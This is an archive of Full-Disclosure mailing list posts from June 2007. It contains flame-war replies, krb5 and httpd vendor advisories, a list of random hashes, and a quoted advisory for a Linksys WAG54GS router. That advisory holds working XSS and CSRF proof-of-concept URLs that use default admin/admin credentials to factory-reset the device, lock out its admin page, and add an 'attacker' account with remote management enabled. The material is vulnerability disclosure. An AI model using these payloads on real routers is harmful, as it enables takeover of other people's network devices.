enable remote management // tries with default credentials and with credentials cached by browser (if any) var img = new Image(); var img2 = new Image(); img.src = 'http://admin:[EMAIL PROTECTED]/setup.cgi?user_list=8sysname=attack ersysPasswd=0wnedsysConfirmPasswd=0wnedremote_management=enableh ttp_wanport=1337devname=snmp_enable=disableupnp_enable=enablewla
Re: [Full-disclosure] Persistent XSS and CSRF on network appliance[subject corrected :) ]
I haven't followed all of this rather strange thread, but I wonder if n_td_v, gobble_ and the venerable Doctor may be one and the same group? After all few educated individuals would be likely to be so pretentious as to declare themselves as both Dr and PhD? As if we might confuse the guy, on this list with a doctor of medicine or a doctor of divinity or a witch doctor? Odd. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Dr. Neal Krawetz PhD Sent: 27 June 2007 23:35 To: pagvac Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Persistent XSS and CSRF on network appliance[subject corrected :) ] I believe this makes you the fool. - doc neal, phd http://www.hackerfactor.com/blog/ On Wed, Jun 27, 2007 at 11:07:11PM +0100, pagvac wrote: I didn't intend to send it twice. On 6/27/07, Dr. Neal Krawetz PhD [EMAIL PROTECTED] wrote: We heard you the first time, gobbles aka n3td3v. - doc neal http://www.hackerfactor.com/blog/ On Wed, Jun 27, 2007 at 10:49:25PM +0100, pagvac wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Nice look up to http://unknown.pentester.googlepages.com/sitemap.xml If you bothered that much you deserve the advisory I guess :-D. btw, I didn't know google pages have sitemap.xml enabled by default. So no hash cracking here, just to set things straight. Joey Mengele wrote: After plugging this hash into John The Ripper, I was able to reproduce the text of the original advisory. It follows in entirety. For those wishing to verify the hash provided by the architect, I have also included the advisory in attachment form as a convenience for the skeptics who say MD5 can not be reversed. J ___ BEGIN LAME CRACKED ADVISORY ___ Persistent XSS and CSRF and on Wireless-G ADSL Gateway with SpeedBooster (WAG54GS) == Date found == 24 June 2007 == Firmware Version == V1.00.06 == Description == There are several persistent XSS vulnerabilities on the '/setup.cgi' script. It is possible to inject JavaScript by assigning a payload like the following to any of the vulnerable parameters: script[PAYLOAD]/script The vulnerable (non-sanitized) parameters are the following: 'devname' 'snmp_getcomm' 'snmp_setcomm' 'c4_trap_ip_' Additionally, all HTTP requests are not tokenized using non- predictable values. Thus, all requests to the router's HTTP interface are vulnerable to Cross-site Request Forgeries (CSRF), perhaps by design. The following is an example of a HTTP request (notice the lack of non-predictable tokens): POST /setup.cgi HTTP/1.1 Authorization: Basic YWRtaW46YWRtaW4= mtenRestore=Restore+Factory+Defaultstodo=defaultsettingsthis_file =Factorydefaults.htmnext_file=index.htmmessage= Although the original request is a POST, we can convert it to a GET, so that all posted parameters can be submitted on a single URL. For example, the previous POST request can be converted to a URL such as the following: http://admin:[EMAIL PROTECTED]/setup.cgi?mtenRestore=Restore+Factor y+Defaultstodo=defaultsettingsthis_file=Factorydefaults.htmnext_f ile=index.htmmessage= By forging administrative requests (Administration button on the router's HTML menu), an attacker can compromise the router provided the victim user visits a malicious URL or HTML page. The attack can only be successfuly if any of the following conditions are met: - the administrator hasn't changed the default credentials (admin/admin) - the administrator's browser has an active authentication session with the router's interface when the attack happens (highly unlikely) == Persistent XSS PoC == The following URL creates a DoS condition by making the Administration page inaccessible since 'history.back()' will run everytime the Administration page is visited. Thus the administrator won't be able to ever change the default credentials unless a hard reset is performed on using the router's physical restart switch: http://admin:[EMAIL PROTECTED]/setup.cgi?user_list=1sysname=admin sysPasswd=adminsysConfirmPasswd=adminremote_management=enablehttp _wanport=8080devname=snmp_enable=disableupnp_enable=enablewlan_e nable=enablesave=Save+Settingsh_user_list=1h_pwset=yespwchanged= yesh_remote_management=enablec4_trap_ip_=scripthistory.back() /scripth_snmp_enable=enableh_upnp_enable=enableh_wlan_enable=ena bletodo=savethis_file=Administration.htmnext_file=Administration. htmmessage= http://tinyurl.com/36sjzw == CSRF PoC == The following HTML page does the following: - adds an *additional* administrative account, with a username equals to 'attacker' and a password equals to '0wned' (without removing original admin account!) - enables remote HTTP
Re: [Full-disclosure] Persistent XSS and CSRF on network appliance [subject corrected :) ]
On 6/27/07, Dr. Neal Krawetz PhD [EMAIL PROTECTED] wrote: We heard you the first time, gobbles aka n3td3v. the ruse has died since jt5944 spoiled the fun. ~_~; try forging the hush.mac.com addr? oh well, i myself would avoid this list after equating full disclosure with extortion and terrorism* like the good doctor did so succinctly in his last response to this fine group... alas, now even your facade is insufficient proxy for mockery. dear Dr. Neal Krawetz, PhD., we know you are listening; why have you forsaken us? --- * Apr 18 2007 - UK ISP threatens security researcher Let's keep in mind that publishing most security information borders extortion. There isn't any other industry where fat nerds try to strongarm large corporations... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Persistent XSS and CSRF on network appliance[subject corrected :) ]
On 6/27/07, Pete Simpson [EMAIL PROTECTED] wrote: ... After all few educated individuals would be likely to be so pretentious as to declare themselves as both Dr and PhD? lol it is the Standford envy; for the AM philosopher must shore up his fine credentials lest the authority and expertise conveyed by such be underestimated... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] rPSA-2007-0135-1 krb5 krb5-server krb5-services krb5-test krb5-workstation
rPath Security Advisory: 2007-0135-1 Published: 2007-06-27 Products: rPath Linux 1 Rating: Critical Exposure Level Classification: Remote Root Deterministic Unauthorized Access Updated Versions: krb5=/[EMAIL PROTECTED]:devel//1/1.4.1-7.7-1 krb5-server=/[EMAIL PROTECTED]:devel//1/1.4.1-7.7-1 krb5-services=/[EMAIL PROTECTED]:devel//1/1.4.1-7.7-1 krb5-test=/[EMAIL PROTECTED]:devel//1/1.4.1-7.7-1 krb5-workstation=/[EMAIL PROTECTED]:devel//1/1.4.1-7.7-1 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2442 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2443 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2798 https://issues.rpath.com/browse/RPL-1499 http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2007-004.txt http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2007-005.txt Description: Previous versions of the krb5 package are vulnerable to three attacks. Two (MITKRB5-SA-2007-004: CVE-2007-2442 and CVE-2007-2443) are likely limited in practice on rPath Linux to denial of service, but the third (MITKRB5-SA-2007-005: CVE-2007-2798) is believed to allow a remote arbitrary code execution attack against kadmind servers. rPath Linux systems are not automatically configured with kadmind enabled. Systems configured as kerberos administrative servers are vulnerable. Copyright 2007 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] rPSA-2007-0136-1 httpd mod_ssl
rPath Security Advisory: 2007-0136-1 Published: 2007-06-27 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Remote Deterministic Denial of Service Updated Versions: httpd=/[EMAIL PROTECTED]:devel//1/2.0.59-0.7-1 mod_ssl=/[EMAIL PROTECTED]:devel//1/2.0.59-0.7-1 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5752 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1863 https://issues.rpath.com/browse/RPL-1500 Description: Previous versions of the httpd package contain two vulnerabilities that affect only non-default configurations. One enables a cross-site-scripting (XSS) attack if ExtendedStatus is enabled and the server status page is publically accessible (not generally recommended), the other allows remote attackers to cause the httpd process to crash by sending a maliciously-crafted request if caching is enabled (CacheEnable). Copyright 2007 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Persistent XSS and CSRF and on network appliance
For the love of god people can we stop with the hashing already? Such research was done by pdp (architect) and myself. We informed the vendor and will publish the details when a fix is available. The following is the MD5 hash for the advisory file. $ md5sum.exe research.txt 3db1d71fc3a0eae119617b3b1124206f *research.txt Regards, - -- pagvac [http://gnucitizen.org, http://ikwt.com/] -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (MingW32) iD8DBQFGgsGdjXB4hX6OC/cRAnwiAKCVI2JC4JNMvWXa3U/4b7WlH4FIfwCg1bL9 4ch1PaYvt6TSWtKVJX2cfgs= =Ls8N -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FLEA-2007-0029-1: krb5 krb5-workstation
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Foresight Linux Essential Advisory: 2007-0029-1 Published: 2007-06-27 Rating: Critical Updated Versions: krb5=/[EMAIL PROTECTED]:devel//1/1.4.1-7.7-1 krb5-workstation=/[EMAIL PROTECTED]:devel//1/1.4.1-7.7-1 group-dist=/[EMAIL PROTECTED]:1-devel//1/1.3.1-0.2-3 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2442 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2443 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2798 http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2007-004.txt http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2007-005.txt https://issues.rpath.com/browse/RPL-1499 Description: Previous versions of the krb5 package are vulnerable to three attacks. Two (MITKRB5-SA-2007-004: CVE-2007-2442 and CVE-2007-2443) are likely limited in practice on Foresight Linux to denial of service, but the third (MITKRB5-SA-2007-005: CVE-2007-2798) is believed to allow a remote arbitrary code execution attack against kadmind servers. Foresight Linux systems are not automatically configured with kadmind enabled. - --- Copyright 2007 Foresight Linux Project This file is distributed under the terms of the MIT License. A copy is available at http://www.foresightlinux.org/permanent/mit-license.html -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.4 (GNU/Linux) iQIVAwUBRoMAZtfwEn07iAtZAQIVWhAAlbOiMLhjLd8e4TqjCx/UXPby0jEBzO5P wMX+mJlGUHnX4FfvYqlNgpPnPL6DdfymieE6AnTxs85/Gsuli2aGLN09gPpG5UW1 MxF2pM3pbYGc5DmLZrWJadmx/q+BQTZ3NHBOi/hYnoMLO3ppnuEhIQYyQkMRJlel UEob7/KYflIZp1QjLcDvbG3Vag+AwGMCybSRMWTP+Mfo+SaXQSbCbumpF8JYBd12 SQjQCrj+hLTyet0DaDqqDj97xUh7F1Nxm7wL3HSxPTBQf6vNKvkcIkACtQVADy4H q5MKJS+oRtVoILdJduhjmaPpEp6XxhAMinPvWdZ3XKOExTae4OvreAOP2hR2aySx V60CZgNR3dsd7FIc+BRY8uIS31yjM+lcHPI8tsvd55cSgdNQ63umw6mleusMgLHY PCkzG+2xEnwQYY6GGXHbhBZsxuRR6JzjKmLWzf5suOJBMLFoKoDYD2ThqodcwX1u XfEgLFI5bTTiU8y8F5XVsjC00IoV+n/aiQ3dtcr1o9REB/Ht99+1+OwUvAGr5hwy qRAoDmkKz4rCXzUB9HHkGyNuv8CIdgpWdsCSbV9RNaqVLbQpf4yokxHWif7KrB/5 BzuK3wg+rorWy1ZYcJo0Zf9ewYRGXQtJ6qhX1Kko+P+hdQ4T/OYCqSf1Lts2X99d 2HzaipeRrok= =aRLv -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Persistent XSS and CSRF and on networkappliance
For the love of god people can we stop with the hashing already? hmm... i like hash ( and cake ) can we have a Month of Hash Cakes? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Month of Random Hashes: DAY FIFTEEN
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ITEM #1] md5: f003f211097296b2550fe760b0a15b56 sha1: 0e5d518cb65a403ef9261865727f9be8b9b8faa1 sha256: e5ac98012e4943b081065f9fa968a862876d64e96ba54c06e7e305114970870f [ITEM #2] md5: da39ec93068bb4ec75c65ce647fa32ef sha1: c2befeaad596b67d2d6c8297be5b4b46bed026b1 sha256: 5becbfb628eea10223fb756712f00f633f3ba479b5b39305ebd0dffbaedf2f18 [ITEM #3] md5: 2189d1195b2e9f7b89e18eff81919a39 sha1: ed657e2c7fe7a68f919dccb4014d35934851d034 sha256: 860527c5982fb6343bc6ac0d335b2dbf86c03d60adc1b17809a74205ae3600f8 [ITEM #4] md5: 59636bc08b73d5d5b6062b4b2d0ad091 sha1: df58520257267ea8f0a166c99742b37ba0f2ff11 sha256: 8ef3b72bd41a57859da9d0745f256d8e5bff9d3d250b6bfbc6dfa8350a3825d4 [ITEM #5] md5: de93832763a69a40faff6586971ce21e sha1: 82cfffe7690c838f60d81bf65aaf014c466e1c21 sha256: 9c6f7b773279592e2ce32e9f48839f4325c89bceb8bb71130a89be363459fb07 [ITEM #6] md5: 61c48d4071c40e85c1bc36bd107e50ef sha1: 017bd2232d99b013777218edd9ab6edfe316886d sha256: 1102aede8b8a904192d27335b48ba33b3f7309961a938505110f319314a8545a [ITEM #7] md5: 0c5e5ff38c585acd6128140789b093c7 sha1: 2e1bbc3b9d2358a8edde9117efa1506cbf7f6d12 sha256: 9d43a3aed0efd2e2dba0f3076b556dc6f5bc2a2384310096f27ff82e169119bf [ITEM #8] md5: bf4f20095703032d6b966bdcbb1b0481 sha1: eedf55eaa6dbb00192a333d4e82d7268effab6bd sha256: 997ee9423e709825dc6e57197544dae07add628136f8acc7cb56656ab7c33f92 [ITEM #9] md5: 8673f9eb71211558dd53cb9e3dceb700 sha1: 0ce86089f62633d8787f03d5361b8b8ef611a143 sha256: d0e9d0bd85ec87901abcf59655deff78b5375fcccdda8e937a2c5d347c11e888 [ITEM #10] md5: b2aa5bee7d025e3053be39049868bbc2 sha1: 22c3d71844c3ea170f677e5c089582f0cc72db82 sha256: 7771c30dd4a6479ecf685554abbbc726331c76bd9f0d77c6ca30e2b4205e8ef6 [ITEM #11] md5: 607aba17bf2fe5768116119be7c590ed sha1: c19c04dc4d4c10394f30c42e2653d0010bc5ad13 sha256: 9f3867d44eb3613441a6f77720db7367c6fc0c63c4a8252c643fe9ca2f8d63ff [ITEM #12] md5: d18a71991fe6fe71863255d800f49b11 sha1: 6f562fdd37fd9b424a3a3a22cf0204622ef6651d sha256: 77807bff775a31e43a5f5c2a5a7a27bccb2cde89869468ff4a30f812bfd8f1a5 [ITEM #13] md5: c7383dcf87ec055cb696b470e494cb3c sha1: b88a37d3da169c83ee09ccd76de1bfe18da183fa sha256: ed145d836befb02784eb01676657ca1f9b394bc6a5994094ade0bef6d2d146d9 [ITEM #14] md5: 4f9ff4093fdfa039e9027b027fb24f70 sha1: 5098e96590198219f00ee97ce27a219e58c51636 sha256: 765773c413c7db77cd8ae0cf6cd2a6e0ab3bbe2dca6e19d69d3d7da8c549fdd1 [ITEM #15] md5: 8e13d1305aeb2b00c8bade97d6d99f38 sha1: 0c252548abd4b02399e52b80ad50898df092bcff sha256: 0af18a8689f44d18555a94848e60513e696baaa2cedecba4b04cefa3daea4245 [ITEM #16] md5: eb2d6067f5f352e3d2913b7ad1880d1b sha1: 357ed1ad735c90fc064f69d646d117e357a1fcfe sha256: bb49541476d10861a445481d652a2e85bed672ddc76fc5f2b320b32d1afbb19a [ITEM #17] md5: 86c7326fcf15eaa95e8ae3baf0e2848c sha1: e320df6042c003df460b7fcb69410f1f4c503ea7 sha256: 2f621b314c6017ba701583eded1b449463afecd3ef5f5baed49c2f88d453bcb7 [ITEM #18] md5: 34f1d685bc696ea1c47fbe7f0a0ac680 sha1: bef9c295c051eeda0670d30b30483369416fc97d sha256: 4378aa8d8bfaa79da2d742ed7a3ab4ca615d0331cfe212e2c16dc5761e7ef645 [ITEM #19] md5: 2eb6dce0a0413a24fd8666c33f242fc9 sha1: 72ed8414eb67f28c99eb825c1e8eecbd61cdf281 sha256: e8c320447b09b8ad2e1b808d01fd11a3d530428e1f1a206317af6bc3eb0f4b51 [ITEM #20] md5: 19c9d4e31bbf5def4e703cfa3768cf5f sha1: ceea75684e12565c9dd4d2f26a7cbcdfd07e52ff sha256: d19374a0e37161bdf2907af17f9738c12ebb05da47a4b98ce470d9e80329fa43 [ITEM #21] md5: fb65b27deb9df544ed186aad339e2bae sha1: 49dc02e4172d42450b2f6ba92b5cc50420bded32 sha256: 0989416396fa41f5010fdb84a3c2750ba2eed0145572ef7b49a40295e52e8797 [ITEM #22] md5: 6376c546ad740b111dbf17983666c1c5 sha1: e995ac32f319883a782753fadb5907521a1c7d63 sha256: 77efa42e2acf8c9f1080684a82089a5566029ef2907a86478711fb58d9ee5289 [ITEM #23] md5: c1817c5a38690b9061da87cce906cf45 sha1: d43e0427af6a35c9c1a248d6d45de974d62343b2 sha256: 8ea3cd3c792a181d2fea3716639fbffb0f59a1d1329aac78dbb0d0fd0660b618 [ITEM #24] md5: 3dd0989a8381ca412cdc77c31a362c24 sha1: 9992b046a04831d568eb4067a9231ae50dbebf46 sha256: 3077f614d3fe43696c64144db7d41ec11bba381c1b0b325c0cae846549820969 [ITEM #25] md5: 0bec4bbdf3b470f7f183dbccd4c89dcb sha1: ad7ade3ecf105a1773a6bc3a671902fc1ade2935 sha256: f66339bf94e8f8b8b7830b38543312325f100757056c6fe34673caeb06879363 [ITEM #26] md5: 2bf3e8bc0dd42d0df0e48a9dde856aeb sha1: 1c423ee318e6e2836364f9765c6a98ca654358ec sha256: 7139924cf262e3639c7d37e4d405afa10e23218bb92ef4112d71687909a3fcdf [ITEM #27] md5: 61c8b420784ac7f13093c385ab910bbd sha1: 5cc0f6ba858bb949a7b0290bd76dadd058f86689 sha256: 9472c9aaca09acef2b599f23fd2f86f5e619b3304e6a21d5828587032160a772 [ITEM #28] md5: ae97942b4badd2e578cf6e1a1d9d2642 sha1: 91ddaa0590d9e07e082daa14dcb8d97a08b4df7e sha256: 06c14c95c3aaf35aee11dbef9850652822560ecf36e2dc013d9f189817b279fe [ITEM #29] md5: 6dea1704c9ea931b80c3bfb64699de33 sha1: 97bd3cbdefe4fcadf9fd2db65a0f0a0e284f0b13 sha256: 7b21c70f2f7e18cc72a2ae976045d626f1e65436fd295e9b86643fe11432ef01 [ITEM #30] md5:
Re: [Full-disclosure] Persistent XSS and CSRF and on network appliance
On 6/27/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: For the love of god people can we stop with the hashing already? The hashes would be less annoying if they had an easily filtered subject line. Let me suggest that anyone who wants to publish a hash of vulnerability report on full disclosure include the string MORH in the subject line, in honor of the Month of Random Hashes project. Presumably anyone with enough of a clue to want to publish a hash of a vulnerability disclosure also has enough of a clue to do so with a standard subject line. Cheers, Brian ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Persistent XSS and CSRF and on network appliance
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Even better ,if you push a hash on us,do tell whether it's a 0-day or a known exploit. Regards, Redhowlingwolves __ It's all about (IN)Security http://www.hacking-passion.com Brian Eaton wrote: On 6/27/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: For the love of god people can we stop with the hashing already? The hashes would be less annoying if they had an easily filtered subject line. Let me suggest that anyone who wants to publish a hash of vulnerability report on full disclosure include the string MORH in the subject line, in honor of the Month of Random Hashes project. Presumably anyone with enough of a clue to want to publish a hash of a vulnerability disclosure also has enough of a clue to do so with a standard subject line. Cheers, Brian ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFGgzvFelSgjADJQKsRAk55AJ9Q5Sx7QEQ6y62W80vVutwtLk6wcACfY0sF jksMVerCQhWjfG3d+Hw+tdc= =OcE3 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
